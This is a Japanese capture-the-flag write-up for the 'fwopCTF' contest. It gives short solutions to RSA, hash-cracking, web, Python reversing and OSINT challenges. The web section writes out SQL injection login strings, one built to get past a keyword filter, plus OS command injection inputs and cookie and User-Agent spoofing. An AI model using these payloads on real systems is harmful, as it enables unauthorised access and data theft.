RSA暗号で、n, p, q, e, cが与えられているが、n = p * qとはなっていない。nはp、qともに割り切れるので、割ってみると、その数値は素数になった。この素数をrとすると、以下のようになるので、あとはそのまま復号する。

n = p * q * r
phi = (p - 1) * (q - 1) * (r - 1)
from Crypto.Util.number import *

n = 7951018409693161668167285098819306759801615467749983772377532762274564323674475529781135819956076874943220398570628206016160240882619874330243093244936395110045993507712409313429053491882557640392921080389040202564944368311332322835084748219968985945494232530915619964225016803746552927248389191728978163526848645974605789560442463273013903681542284658299342143
p = 1929116635275264735053674741049427216734778196597952692885273974756157874848524489523506992386257196915978454424769273897
q = 1903374449504601072452320486035709413287524054085898117310656797189766004182623359564618504846582607657952100194953437513
e = 65537
c = 5966972166891478943697533397002317526062125536151178353483752855912660840768728401988233413928558098251299119103372377488247940263788187179216261221551423070667612264065068718276490178352621443926803409497199336389072678702084464080895190403103597610490385133200289793164066702537822343346786026894342086902097286424450736331498175097265162507503062204219321005

assert n % p == 0
assert n % q == 0

r = n // (p * q)
assert isPrime(r)

phi = (p - 1) * (q - 1) * (r - 1)
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print flag

fwopCTF{triple_primes_also_work}

Teenager RSA (Crypto 500)

1文字ずつRSA暗号を行っていると推測できる。またp, q, eは不明だが、20より小さいので"fwopCTF{"で始まることを前提にブルートフォースで復号する。

from Crypto.Util.number import *

enc = [119, 37, 45, 18, 89, 72, 60, 7, 80, 21, 59, 4, 4, 17, 33, 39, 21, 32,
    62, 49, 80, 17, 59, 49, 62, 17, 37, 62, 59, 68, 5]

flag_head = 'fwopCTF{'

found = False
for p in range(1, 20):
    for q in range(1, 20):
        for e in range(1, 20):
            success = True
            for i in range(len(flag_head)):
                m = ord(flag_head[i])
                if pow(m, e, p * q) != enc[i]:
                    success = False
                    break
            if success:
                found = True
                break
        if found:
            break
    if found:
        break

print '[+] p =', p
print '[+] q =', q
print '[+] e =', e

phi = (p - 1) * (q - 1)
d = inverse(e, phi)

flag = ''
for c in enc:
    m = pow(c, d, p * q)
    flag += chr(m)
print '[*] flag =', flag

実行結果は以下の通り。

[+] p = 11
[+] q = 13
[+] e = 7
[*] flag = fwopCTF{small_numbers_are_weak}
fwopCTF{small_numbers_are_weak}

Thanos RSA (Crypto 500)

eが小さいので、Low Public-Exponent Attackで復号する。

from Crypto.Util.number import *
import gmpy

n = 90853943628322295026593682475987617060873593704720419107522455730118510052263265463293746646770270649687914442326502298395536584315638883283598508714600968672217889495196802078585067900709511094279209391102167066735509213687150809291297894333497926049791571469926970525133534853823359619169977902549379766690271029677550623981924039537745336236460806578804468603462430628647190394537926168276717097453855467142322886378913606046349505735904238841871750986024415032881423400763965392179016644748395748894328459546597234450779143514757379951569086179358016591843479108891552906656123595991984678135372139
e = 3
c = 353690381812046953967046705467201123771968703796985157143856239677213620452330219172911759040152594421289421265846324253121362172623915294111963396504119782165935747889254103399163563246766329595499703665701197666661

m = gmpy.root(c, e)[0]
flag = long_to_bytes(m)
print flag

fwopCTF{small_exponent_is_bad}

Super Safe Password (Crypto 500)

ブルートフォースでパスワードを求める。

import hashlib

with open('10k-most-common.txt', 'r') as f:
    words = f.read().splitlines()

found = False
for word in words:
    for word2 in words:
        password = 'fwopCTF{%s%s}' % (word, word2)
        h = hashlib.md5(password).hexdigest()
        if h == 'f4552088fd3266916b4fb22757b668cc':
            found = True
            print password
            break
    if found:
        break

fwopCTF{cyprusdante1}

In Front Of Your Eyes (Web 100)

HTMLソースを見たら、フラグが見つかった。

fwopCTF{Wolfy_The_Wolf}

Wacky CSS (Web 100)

HTMLソースを見ると、cssがリンクされている。https://web.fweefwop.club/wacky_css.cssにアクセスすると、コメントにフラグが書いてあった。

fwopCTF{Take_my_hand_to_your_fantasy}

Robot Invasion (Web 100)

https://web.fweefwop.club/robots.txtにアクセスすると、こう書いてある。

User-agent: *
Disallow: /
Disallow: /totally_evil_plan

https://web.fweefwop.club/totally_evil_planにアクセスすると、フラグが見つかった。

Step 1: Hire engineers to build a robot army that follows my every command
Step 2: Command those robots to obliterate the engineers because I am broke and cannot afford to pay them
Step 3: ???
Step 4: World Domination
fwopCTF{k1ller_r0bots_wilL_rUl3_th3_W0rld!!1}
fwopCTF{k1ller_r0bots_wilL_rUl3_th3_W0rld!!1}

Marq-weeeeeee! (Web 100)

フラグっぽい文字列がたくさん流れてくるが、フラグ形式としてはおかしいものがほとんど。"fwopCTF{"で検索すると一つだけヒットした。

fwopCTF{t3f0n00}

No Inspector (Web 100)

HTMLソースにjsのリンクがある。https://web.fweefwop.club/boring_script.jsにアクセスすると、こう書いてあった。

console.log("Oh, okay, so it seems like you do actually know your stuff.");
console.log("You can join, but just promise me you won't discuss this with anyone. Don't want my parents finding out.");
console.log("fwopCTF{funky_0n_4_fr1day_n1ght}");
fwopCTF{funky_0n_4_fr1day_n1ght}

Complete me (Web 200)

SQLの条件を記述する際の句を答えればよい。

where

Cookies (Web 250)

CookieのUsernameキーには"user"が設定されている。[Get Cookies!]をクリックすると、「Sorry, only COOKIE MONSTER has cookies!」と表示される。
CookieのUsernameキーに"COOKIE MONSTER"と設定し、[Get Cookies!]をクリックしてみると、フラグが表示された。

fwopCTF{Nom_nom_cookies}

client side login (Web 300)

ユーザ名を入力する画面。HTMLソースを見ると、以下のように書かれている。

        <script>
            function verify()
            {

                var uname = document.getElementById("input");
                if(uname.value.length == 10 && uname.value.substring(1, 4) == "bef" && uname.value.charCodeAt(8) + 20 == 117){
                    document.getElementById("flag").innerHTML = document.getElementById("text").innerHTML.substring(1080, 1100);
                }else{
                    alert("nay");
                }
            }
        </script>

これを満たすユーザ名を指定すれば良さそう。「abefaaaaaa」を入力すると、フラグが表示された。

fwopCTF{SFOVF5TENW}

weird requests huh (Web 400)

PUTメソッドでアクセスしてみる。

$ curl -X PUT https://web.fweefwop.club/requests.php
fwopCTF{what_does_put_even_do??}


<html>
<head>
</head>
<body>
<center><p>i love PUTting people down </p>
<img src="dino.jpg" />
</center>
</body>
</html>

fwopCTF{what_does_put_even_do??}

53Cr37 8r0W53r (Web 400)

HTMLソースを見るとこう書いてある。

Sorry, only our secret agents on our secret browser can access this site.		</p>
<!-- Agent 014, you will need to reinstall the A3SECRET browser again.  We had to wipe your computer because there were government secrets on it. -->

UserAgentに"A3SECRET"を指定してアクセスする。

$ curl -A "A3SECRET" https://web.fweefwop.club/agent.php
<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">		

		<title>secret agent landing page</title>
		<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
		<link rel="stylesheet" href="agent.css"/>
		
	</head>

	<body class="p-2 mb-1 text-white ">
		<h1 class="text-center">Secret Agent Landing Page</h1>
		<br />
		<p class="text-center">
		fwopCTF{secret_browser_007}		</p>
		<!-- Agent 014, you will need to reinstall the A3SECRET browser again.  We had to wipe your computer because there were government secrets on it. -->
		
	</body>
</html>

fwopCTF{secret_browser_007}

KevinSay (Web 400)

OSコマンドインジェクションを行う。

■`ls`を入力
flag193290.txt

■`cat flag193290.txt`を入力
fwopCTF{C0MM4ND1NDJ3C710N11}
fwopCTF{C0MM4ND1NDJ3C710N11}

SQLI (Web 500)

以下でログインすると、フラグが表示された。

Username: ' or 1=1 #
Password: a
fwopCTF{Leaked_data_123}

SQLI But Filtered? (Web 600)

http://web.fweefwop.club:8402/robots.txtにアクセスすると、こう書いてある。

User-agent: *
Disallow: /filter.php

http://web.fweefwop.club:8402/filter.phpにアクセスする。
Filters: -- # /* OR AND NOT NULL
|

上記がブラックリストになっている。以下でログインしてみると、フラグが表示された。

Username: a
Password: ' union select 1, 'admin', 'pass
fwopCTF{f1lt3rs_not_good_3n0ugh}

Reversing Python 1 (Reverse 100)

Pythonコードが添付されている。そのままフラグ文字列と比較している。

fwopCTF{no_python_required}

Reversing Python 2 (Reverse 150)

Pythonコードが添付されている。var4のフラグ文字列と比較している。

fwopCTF{perhaps_this_is_the_flag}

Reversing Python 3 (Reverse 175)

Pythonコードが添付されている。var3のフラグ文字列と比較している。var3に複数回別の文字列が設定されているので、最後に設定された文字列がフラグになる。

fwopCTF{see_seesaw_sheshore_see_sheshore_seasells_shells}

Reversing Python 3 Bonus (Reverse 250)

Pythonコードが添付されている。kaq8hとnw91の値を結合し、fwopCTF{}で囲ったものがフラグ。上にさかのぼって変数を検索する。

kaq8h = "a505d061c2baf118fce231d8bfc7c1cb"
nw91 = "ad34ccf7f2ed2c4b8b8c675c235fd744"
fwopCTF{a505d061c2baf118fce231d8bfc7c1cbad34ccf7f2ed2c4b8b8c675c235fd744}

Reversing Python 4 (Reverse 250)

Pythonコードが添付されている。判定直前にcorrectflagを出力させる。

#!/usr/bin/env python3

var1 = 15
var2 = 4
var3 = 9

if var1 < var3:
    var2 = var1 + var3
elif var3 > var2:
    var1 = (var1 * var2) - var2
else:
    var3 = var2 * var1

if var1 - var2 * var3 >= 10:
    var1 = 15 - var3
    var3 = var1 * var2
else:   
    var2 = var1 / var2
    var3 = var3 * 2


if var1 + var2 > var3:
    if var2 + 2 != var1:
        correctflag = "fwopCTF{else_elif_if_elif_else_else}"
    elif var3 - var1 >= var2 * var2:
        correctflag = "fwopCTF{else_if_then_then_else_elif}"
    elif var3 + var1 + var2 <= var3 + var1 * var2:
        correctflag = "fwopCTF{then_else_else_then_if_if}"

var3 = (var3 * -1) + var1 + var2

if var3 + var2 + var1 * 2 >= 0:
    if var3 == var2 * -2:
        correctflag = "fwopCTF{else_then_if_then_elif_elif}"
    elif var2 * var1 - var3 == 3 * var1 + 5 * var2:
        correctflag = "fwopCTF{then_if_then_else_if_if}"
    else:
        correctflag = "fwopCTF{elif_if_if_then_elif_elif}"
        
print(correctflag)

fwopCTF{then_if_then_else_if_if}

Reversing Python 5 (Reverse 275)

Pythonコードが添付されている。判定直前にcorrectflagを出力させる。

#!/usr/bin/env python3

correctflag = "deoxyribonucleic_acid"
correctflag = correctflag[0:4] + correctflag[7:16] + correctflag[5:2:-1]
correctflag = correctflag[4:-4] + correctflag[3*4:-1] + correctflag[-1:0:-2]
print(correctflag)

bonucleicryxriluoxe
fwopCTF{bonucleicryxriluoxe}

Reversing Python 6 (Reverse 300)

Pythonコードが添付されている。判定直前にcorrectflagを出力させる。

#!/usr/bin/env python3

alphabet = "abcdefghijklmnopqrstuvwxyz{}_ABCDEFGHIJKLMNOPQRSTUVWXYZ"
code = [5, 22, 14, 15, 31, 48, 34, 26, 0, 11, 18, 14, 28, 2, 17, 24, 15, 19, 14, 28, 11, 14, 11, 27]
correctflag = ""
for currentNum in code:
    correctflag = correctflag + alphabet[currentNum]
print(correctflag)

fwopCTF{also_crypto_lol}

Reversing Python 7 (Reverse 350)

スクリプトの処理概要は以下の通り。

・フラグの長さは20であるかをチェック
・フラグの後半8バイトを前半12バイト入れ替え
・semicolonpos: ;のインデックス
・enteredFlag = enteredFlag[0:semicolonpos] + "o_dddduel}"
・enteredFlag == "fwopCTF{its_time_to_dddduel}"であるかをチェック

入れ替えをして、qが入っている必要があることを考慮する。

its_time_t;qfwopCTF{

Fwop Door (Reverse 500)

Pythonコードが添付されている。フラグの各文字について条件がたくさんあるので、z3で解く。

from z3 import *

n = [Int('n[%d]' % i) for i in range(60)]
s = Solver()

s.add(n[9] + n[32] + n[26] == 337)
s.add(n[47] + n[14] + n[58] == 329)
s.add(n[56] + n[32] + n[19] == 316)
s.add(n[32] + n[6] + n[51] == 304)
s.add(n[43] + n[14] + n[44] == 318)
s.add(n[55] + n[2] + n[50] == 313)
s.add(n[36] + n[50] + n[35] == 311)
s.add(n[52] + n[42] + n[55] == 311)
s.add(n[44] + n[9] + n[22] == 335)
s.add(n[57] + n[27] + n[32] == 344)
s.add(n[8] + n[33] + n[16] == 322)
s.add(n[38] + n[6] + n[26] == 273)
s.add(n[53] + n[27] + n[2] == 327)
s.add(n[15] + n[35] + n[32] == 328)
s.add(n[17] + n[15] + n[21] == 308)
s.add(n[28] + n[52] + n[22] == 326)
s.add(n[12] + n[53] + n[48] == 317)
s.add(n[34] + n[50] + n[6] == 279)
s.add(n[22] + n[32] + n[47] == 347)
s.add(n[30] + n[32] + n[38] == 333)
s.add(n[48] + n[7] + n[59] == 359)
s.add(n[40] + n[15] + n[31] == 299)
s.add(n[20] + n[30] + n[15] == 304)
s.add(n[19] + n[7] + n[13] == 321)
s.add(n[54] + n[36] + n[56] == 306)
s.add(n[37] + n[10] + n[5] == 284)
s.add(n[0] + n[4] + n[6] == 239)
s.add(n[41] + n[52] + n[11] == 315)
s.add(n[18] + n[42] + n[10] == 315)
s.add(n[3] + n[55] + n[34] == 333)
s.add(n[27] + n[45] + n[43] == 338)
s.add(n[25] + n[51] + n[39] == 321)
s.add(n[16] + n[35] + n[4] == 290)
s.add(n[4] + n[28] + n[59] == 306)
s.add(n[5] + n[44] + n[31] == 295)
s.add(n[6] + n[56] + n[58] == 276)
s.add(n[14] + n[22] + n[25] == 300)
s.add(n[51] + n[4] + n[36] == 284)
s.add(n[2] + n[38] + n[5] == 296)
s.add(n[11] + n[40] + n[49] == 336)
s.add(n[35] + n[38] + n[31] == 317)
s.add(n[23] + n[34] + n[5] == 295)
s.add(n[1] + n[5] + n[52] == 307)
s.add(n[46] + n[26] + n[33] == 298)
s.add(n[13] + n[1] + n[23] == 311)
s.add(n[49] + n[36] + n[50] == 313)
s.add(n[39] + n[25] + n[16] == 313)
s.add(n[58] + n[36] + n[18] == 322)
s.add(n[31] + n[7] + n[28] == 338)
s.add(n[21] + n[35] + n[45] == 333)
s.add(n[24] + n[46] + n[33] == 299)
s.add(n[29] + n[15] + n[0] == 292)
s.add(n[26] + n[5] + n[23] == 283)
s.add(n[10] + n[52] + n[39] == 319)
s.add(n[7] + n[12] + n[44] == 334)
s.add(n[50] + n[27] + n[29] == 301)
s.add(n[33] + n[22] + n[43] == 320)
s.add(n[45] + n[49] + n[10] == 338)
s.add(n[42] + n[58] + n[57] == 326)
s.add(n[59] + n[10] + n[12] == 331)
s.add(n[18] == 110)

r = s.check()
if r == sat:
    m = s.model()
    flag = ''
    for i in range(60):
        flag += chr(m[n[i]].as_long())
    print flag

fwopCTF{quite_a_long_flag_for_reverse_eng_dont_you_think_so}

Reversing Python 8 (Reverse 500)

スクリプトでは、フラグの長さが27であるかをチェックし、ある法則でシャッフルしている。法則を整理するのが面倒なので、異なる文字27文字をシャッフルさせ、その結果から元に戻すようにする。

#!/usr/bin/env python3
import string

enteredFlag = string.ascii_lowercase + '0'
coolarray = [[[], [], []], [[], [], []], [[], [], []]]
for i in range(3):
    for j in range(3):
        for k in range(3):
          coolarray[i][j].append(enteredFlag[i*9 + j*3 + k])
newflag = ""
for i in [coolarray[2], coolarray[0], coolarray[1]]:
    for j in i[::-1]:
        for k in [j[1], j[2], j[0]]:
            newflag = newflag + k

enc = "s}ginh_td{aFCTpwofolhs_yrar"

flag = ""
for i in range(len(enc)):
    index = newflag.index(enteredFlag[i])
    flag += enc[index]
print(flag)

fwopCTF{arrays_hold_things}

A street named what? (OSINT 100)

写真にあるAppleのロゴのところに記載されている場所の名前は「Apple Park Visitor Center」その前の通りの名前を答える。

fwopCTF{Pruneridge}

Where is everybody? (OSINT 100)

「deserted 2027」で検索すると、https://www.dailymail.co.uk/femail/article-9418269/Man-claims-woken-year-2027-gone-viral-TikTok.htmlなどのページが見つかる。
Javierという名前のTikTokユーザーがスペインのバレンシアの人けのない通りのビデオを共有したという記事が書かれている。

Valencia

The Rock (OSINT 200)

"The Rock"の映画を調べると、アルカトラズ島を占拠したアメリ海兵隊の英雄率いるテロリストと、制圧する特殊部隊との攻防を描いた作品とのこと。念のために、アルカトラズ島を調べると、以下の位置で写真と似たような景色が見えた。

https://www.google.co.jp/maps/@37.8256032,-122.422231,2a,75y,355.28h,95.7t,360r/data=!3m6!1e1!3m4!1sq2Sui4ey80V-GY6I_Gp6sg!2e0!7i13312!8i6656?hl=ja
fwopCTF{Alcatraz}

Location Location (OSINT 200)

問題には緯度、経度の計算結果らしきものがある。

>>> a = 10.9219612
>>> b = -19.712993
>>> x = (a + b) / 2
>>> y = (a - b) / 2
>>> x
-4.3955159
>>> y
15.317477100000001

xが緯度、yが経度として、調べる。

https://www.google.co.jp/maps/place/4%C2%B023'43.9%22S+15%C2%B019'02.9%22E/@-4.3955105,15.3152884,17z/data=!3m1!4b1!4m5!3m4!1s0x0:0x0!8m2!3d-4.3955159!4d15.3174771?hl=ja
Kinshasa

Kevin Gaming (OSINT 200)

このKevinさんが誰のことなのか、Twitterのツイートをヒントに探してみたが、わからない。適当にゲーム機の名前を入れたら、通った。

fwopCTF{PlayStation_2}

Lighthouse (OSINT 250)

画像検索すると、https://no.pinterest.com/pin/618963542506418652/などが見つかる。

Point Pinos Lighthouse in Pacific Grove, California, United States
Pacific Grove

Kevin Took The Flag (OSINT 250)

Internet Archiveで見てみると、202/7/3に2回スナップショットが取られている。17:42:10のものを見てみると、フラグが書いてあった。
f:id:satou-y:20211105232607p:plain

fwopCTF{wayback_machine_doesn't_let_me_play_club_penguin_again_D:}

Bitcoin Laundering (2) (OSINT 250)

https://www.blockchain.com/btc/address/16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYweを調べる。
f:id:satou-y:20211105232708p:plain
該当の日時に3M219KR5vEneNb47ewrPfWyb5jQ2DjxRP6のアドレスが見つかる。
https://www.blockchain.com/btc/address/3M219KR5vEneNb47ewrPfWyb5jQ2DjxRP6を調べる。
該当期間で3M219KR5vEneNb47ewrPfWyb5jQ2DjxRP6宛のBTCで最大のものを探す。
f:id:satou-y:20211105232742p:plain

30888

Kevin's secret (OSINT 275)

$ git clone https://github.com/fweefwopkevin/country-flags
Cloning into 'country-flags'...
remote: Enumerating objects: 5368, done.
remote: Counting objects: 100% (753/753), done.
remote: Compressing objects: 100% (432/432), done.
remote: Total 5368 (delta 333), reused 663 (delta 321), pack-reused 4615
Receiving objects: 100% (5368/5368), 30.67 MiB | 8.04 MiB/s, done.
Resolving deltas: 100% (1295/1295), done.
Checking out files: 100% (1027/1027), done.
$ cd country-flags/.git
$ git log --all
commit 24b6c22afd7a18fe2a8343c8a94b364558946f1d (HEAD -> main, origin/main, origin/HEAD)
Author: fweefwopkevin <92276932+fweefwopkevin@users.noreply.github.com>
Date:   Sat Oct 16 20:07:42 2021 -0700

    Flag was redacted

commit 7c568d775c7363e9f86681452a5f85bcb4a12f10
Author: fweefwopkevin <92276932+fweefwopkevin@users.noreply.github.com>
Date:   Sat Oct 16 20:06:41 2021 -0700

    Create flag.txt

commit 6c887625a427c760099d993d56894be274d30b4f
Author: Wyatt O'Day <wyatt@wyday.com>
Date:   Fri Sep 24 13:20:18 2021 -0400

    Reduce flag of India size. Visually unchanged.

commit ec8815a9ead98e2f86cc871b8493b9c99f7e5c0c
Merge: 5746d5a 02289f2
Author: Wyatt OʼDay <wyatt@wyday.com>
Date:   Fri Sep 24 11:56:08 2021 -0400

    Merge pull request #123 from ronak69/main
    
    Update Flag of India

$ ls -lR objects/
objects/:
合計 0
drwxrwxrwx 1 root root 0 10月 25 11:02 info
drwxrwxrwx 1 root root 0 10月 25 11:02 pack

objects/info:
合計 0

objects/pack:
合計 31556
-r-xr-xr-x 1 root root   151376 10月 25 11:02 pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.idx
-r-xr-xr-x 1 root root 32161291 10月 25 12:09 pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.pack

objectディレクトリにオブジェクト本体はなく、packがあるので、レポジトリを作ってそこで展開する。

$ cd ../..
$ git init newrepo
Initialized empty Git repository in /XXX/XXX/XXX/newrepo/.git/
$ cp -p ../country-flags/.git/objects/pack/pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.pack .
$ git unpack-objects < pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.pack
Unpacking objects: 100% (5368/5368), done.
$ cd newrepo/.git

オブジェクトを見ていく。

$ python -c 'import zlib; print zlib.decompress(open("objects/7c/568d775c7363e9f86681452a5f85bcb4a12f10").read())'
commit 726tree 395463cf3af3f316a11517c3ccf04096b33801ee
parent 6c887625a427c760099d993d56894be274d30b4f
author fweefwopkevin <92276932+fweefwopkevin@users.noreply.github.com> 1634440001 -0700
committer GitHub <noreply@github.com> 1634440001 -0700
gpgsig -----BEGIN PGP SIGNATURE-----
 
 wsBcBAABCAAQBQJha5NBCRBK7hj4Ov3rIwAAOj8IADPlfgN5Z5NjiDR98WzLYY6t
 N5FMXs8VmlixgGQM6zc2Cy2fYDk9AaSi5FjmrCKQf/whXa20uH+JeAPFJAUfy0BU
 G9seDitWl+z7rkKRVFQ6Woo7g7/1yeJR6I+aakwUKztdghpK5SKPd6IijPoMssDl
 IQUs1dpuOqReyjqcorfKv6ocWQZISnO9FQd7nO7byhe7hpVJprLgayi439A4Z6sd
 /ig7eLrKb680YsggYpumntFeBR+JlJ/XH9kgr4KIZfQgzAUzIstzjZkX+gFJzz2k
 e073qA/FESn1NulL7Tuwr8IvKJbLrCtVkuT1ibnhTsx/X7VUwYzvDJEo1HoD2Wc=
 =Ev3Z
 -----END PGP SIGNATURE-----
 

Create flag.txt

$ python -c 'import zlib; print zlib.decompress(open("objects/39/5463cf3af3f316a11517c3ccf04096b33801ee").read())' | xxd -g 1
00000000: 74 72 65 65 20 33 36 33 00 31 30 30 37 35 35 20  tree 363.100755 
00000010: 2e 67 69 74 69 67 6e 6f 72 65 00 44 45 c2 3f 86  .gitignore.DE.?.
00000020: c9 62 9d a6 28 aa 92 d4 36 6b b5 08 75 48 5e 31  .b..(...6k..uH^1
00000030: 30 30 36 34 34 20 52 45 41 44 4d 45 2e 6d 64 00  00644 README.md.
00000040: 02 4c 62 ff ed 0d fb e8 6c 23 50 f3 f5 87 d0 31  .Lb.....l#P....1
00000050: 04 75 fe d8 31 30 30 36 34 34 20 63 6f 75 6e 74  .u..100644 count
00000060: 72 69 65 73 2e 6a 73 6f 6e 00 9b a3 84 44 74 ce  ries.json....Dt.
00000070: 0f 6b 13 0b 65 6b 8f 5c 53 6d d6 85 0f 5b 31 30  .k..ek.\Sm...[10
00000080: 30 36 34 34 20 66 6c 61 67 2e 74 78 74 00 0a 87  0644 flag.txt...
00000090: cb 2a d2 13 5b 69 25 76 fa 54 52 22 2f e8 72 27  .*..[i%v.TR"/.r'
000000a0: d9 85 31 30 30 36 34 34 20 70 61 63 6b 61 67 65  ..100644 package
000000b0: 2e 6a 73 6f 6e 00 0f 37 50 99 49 52 ad 14 f8 a3  .json..7P.IR....
000000c0: 65 4d c8 c8 8e eb 95 bf ee a9 34 30 30 30 30 20  eM........40000 
000000d0: 70 6e 67 31 30 30 30 70 78 00 c2 bd 5f 01 2c 64  png1000px..._.,d
000000e0: c1 f1 17 5d 12 47 27 f6 e9 a8 ab 4d bb 71 34 30  ...].G'....M.q40
000000f0: 30 30 30 20 70 6e 67 31 30 30 70 78 00 31 aa 4f  000 png100px.1.O
00000100: 9b 0e 05 5b 05 cb 36 3a d1 e3 0a dd 21 7f 75 bf  ...[..6:....!.u.
00000110: 63 34 30 30 30 30 20 70 6e 67 32 35 30 70 78 00  c40000 png250px.
00000120: 87 2d 1e a5 37 7c 60 45 0d a8 65 1c 53 25 d4 74  .-..7|`E..e.S%.t
00000130: 45 d9 2b da 34 30 30 30 30 20 73 63 72 69 70 74  E.+.40000 script
00000140: 73 00 11 8c 23 ca 1b 02 33 c9 69 0a 76 16 84 47  s...#...3.i.v..G
00000150: dc c3 a8 04 65 b4 34 30 30 30 30 20 73 76 67 00  ....e.40000 svg.
00000160: 94 9e 68 e7 8d 07 08 9b 6a 53 ad a0 94 2c 9f 88  ..h.....jS...,..
00000170: b8 ee 2b 9b 0a                                   ..+..

$ python -c 'import zlib; print zlib.decompress(open("objects/0a/87cb2ad2135b692576fa5452222fe87227d985").read())'
blob 29620Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer consequat tellus ligula, vitae vulputate urna mattis nec. Donec sollicitudin nisl diam, sit amet auctor elit congue ac. Vestibulum finibus sit amet justo quis volutpat. Phasellus lacus purus, lobortis nec metus nec, fringilla condimentum sem. Maecenas a tincidunt justo. Nulla facilisi. Proin egestas bibendum ligula id ullamcorper. Vivamus vel sollicitudin tellus, et imperdiet magna. Fusce iaculis gravida lorem ultricies rhoncus. Nulla a nulla faucibus, consequat felis ut, efficitur purus.

Aliquam semper id dui ac elementum. Integer et leo arcu. Nunc interdum, turpis a eleifend fringilla, massa ligula iaculis erat, dictum hendrerit mi urna sed ipsum. Praesent fermentum enim vel ante ullamcorper porta. Aliquam convallis semper est nec vehicula. Sed in orci neque. Nullam nec sapien diam.

Vivamus hendrerit condimentum ligula, at dictum urna. Curabitur in gravida turpis, non mollis orci. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Integer condimentum egestas nisi, sed ornare arcu porttitor eu. Nam dignissim leo a efficitur blandit. Donec tincidunt dignissim risus in pulvinar. Nam nec blandit tortor. Aenean vulputate urna augue, ut venenatis odio pulvinar et. Mauris viverra pharetra ex eget luctus. In libero arcu, congue ac nulla id, vulputate efficitur ex. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Nunc porttitor neque luctus nunc consectetur malesuada. Fusce accumsan tortor et odio pulvinar tristique. Integer at auctor enim. Praesent et libero ac est luctus lacinia.

Vivamus ut leo eu ante feugiat tristique egestas quis tortor. Nullam semper nisi in sagittis tincidunt. Aenean efficitur, ligula condimentum tempus iaculis, turpis tellus varius velit, in tempor libero nisi eget nisi. Praesent placerat dolor id efficitur eleifend. Nunc convallis tempus urna sed rhoncus. Integer facilisis interdum enim, nec feugiat dolor sodales vitae. Vivamus cursus eget est at congue. Morbi maximus viverra nibh mattis dignissim. Curabitur purus odio, tincidunt at vestibulum id, bibendum vel mi. Nunc commodo, nunc in efficitur aliquet, orci elit ultrices dolor, rutrum rutrum enim quam non justo. Duis feugiat ligula nec ipsum feugiat vehicula. Nam consectetur tincidunt libero quis tristique. Quisque volutpat justo ac diam viverra sagittis.

Quisque a gravida lacus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Suspendisse sit amet enim commodo, sollicitudin nisi gravida, malesuada arcu. Curabitur id tellus semper, consectetur nisi vel, maximus erat. Nulla maximus, ante ac auctor placerat, libero nisi accumsan lectus, nec luctus lacus lacus vitae magna. Morbi venenatis arcu non fringilla efficitur. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Fusce tristique neque ligula, sed posuere tellus rhoncus in. Lorem ipsum dolor sit amet, consectetur adipiscing elit. In feugiat augue orci, nec malesuada mi elementum fermentum. Etiam sed risus nec nulla iaculis bibendum. Interdum et malesuada fames ac ante ipsum primis in faucibus.

Nam et quam vel erat facilisis placerat sed et libero. Nulla at sem eget nisl consectetur posuere non vitae eros. Vestibulum eget justo luctus, rutrum mi vel, tristique elit. Donec tempor tellus massa, quis blandit lectus eleifend at. Donec faucibus condimentum odio, ut interdum nunc sollicitudin a. Nunc sit amet eros id velit auctor viverra. Curabitur ultricies commodo velit, ac placerat mi vehicula sit amet. Etiam est nibh, dignissim non lorem ut, luctus laoreet nulla. Interdum et malesuada fames ac ante ipsum primis in faucibus. Duis non diam nec purus auctor elementum. Pellentesque elit leo, tristique sed auctor sed, condimentum in est.

Aliquam consequat, metus a dapibus tincidunt, turpis eros tincidunt tortor, vitae accumsan tellus purus ultricies justo. Duis dui dui, aliquet ac placerat vitae, viverra nec quam. Ut lacinia ultricies eros, consectetur viverra justo pellentesque sollicitudin. Integer sed mauris enim. Etiam bibendum dui nec felis tempus, nec viverra purus malesuada. Etiam at consequat ex. Sed et facilisis orci, vel consequat urna. Mauris lorem libero, commodo non purus id, tempor tincidunt mi. Suspendisse diam orci, faucibus ut pretium sed, egestas vel odio. Quisque nec consequat orci, ac pellentesque dui. Integer rutrum suscipit tempus. Vivamus ac accumsan dolor. Duis eleifend metus vitae odio rhoncus commodo.

Integer tortor elit, convallis vitae fringilla placerat, interdum sed nibh. Ut consectetur nulla ut eros pellentesque, eu varius enim sollicitudin. Curabitur egestas metus in laoreet gravida. Donec pellentesque, erat vitae placerat posuere, felis justo dignissim eros, sed aliquet tellus mi id nisl. Sed tristique mauris eu nulla elementum, ac rhoncus purus lobortis. Vestibulum mattis dictum nulla, mollis bibendum mauris tristique vitae. Etiam vel bibendum nisi. Suspendisse potenti. Nunc et convallis massa.

Nulla facilisi. Mauris consequat urna eu libero feugiat, ut semper nulla consectetur. Proin accumsan finibus arcu, sed elementum eros varius sit amet. Suspendisse orci sem, hendrerit nec feugiat consequat, vehicula ultrices lacus. Aenean leo est, tempor at nunc eu, pretium consequat felis. Vestibulum neque ligula, malesuada ut nunc et, pretium convallis ligula. Nulla quis ultrices erat.

Morbi efficitur eros et laoreet accumsan. Suspendisse consequat, arcu vel venenatis tincidunt, nunc lacus dictum nunc, nec bibendum lacus nunc a turpis. Vivamus dictum suscipit feugiat. Mauris ornare turpis non nisi convallis condimentum. Fusce nec lectus bibendum, consequat urna eget, scelerisque lectus. In viverra neque sit amet lacus lobortis iaculis. Pellentesque egestas mi sit amet mi vehicula, at sodales nisi rhoncus. Duis congue arcu lacus, id tincidunt erat facilisis in.

